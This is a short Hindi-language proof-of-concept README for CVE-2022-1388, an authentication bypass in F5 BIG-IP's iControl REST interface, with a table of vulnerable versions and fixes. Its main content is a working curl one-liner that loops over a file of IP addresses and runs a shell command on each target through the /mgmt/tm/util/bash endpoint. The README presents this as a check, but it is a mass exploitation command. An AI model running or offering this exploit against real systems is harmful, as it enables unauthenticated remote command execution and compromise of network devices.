
BIG-IP iControl REST भेद्यता CVE-2022-1388 PoC

यह भेद्यता एक अनधिकृत हमलावर को BIG-IP सिस्टम तक प्रबंधन पोर्ट और/या सेल्फ IP पतों के माध्यम से नेटवर्क पहुँच के साथ मनमानी सिस्टम कमांड निष्पादित करने, फ़ाइलें बनाने या हटाने, या सेवाओं को अक्षम करने की अनुमति दे सकती है।
आप F5 Big-IP भेद्यता की जाँच के लिए निम्नलिखित curl वन-लाइनर का उपयोग कर सकते हैं या दिए गए python स्क्रिप्ट का उपयोग कर सकते हैं।
cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done
| ब्रांच | भेद्य संस्करण | पेश किए गए फिक्स |
|---|---|---|
| 11.x | 11.6.1-11.6.5 | No Fix |
| 12.x | 12.1.0-12.1.6 | No Fix |
| 13.x | 13.1.0-13.1.4 | 13.1.5 |
| 14.x | 14.1.0-14.1.4 | 14.1.4.6 |
| 15.x | 15.1.0-15.1.5 | 15.1.5.1 |
| 16.x | 16.1.0-16.1.2 | 16.1.2.2 |
| 17.x | None | 17.0.0 |
शमन के बारे में अधिक जानकारी के लिए संदर्भ देखें।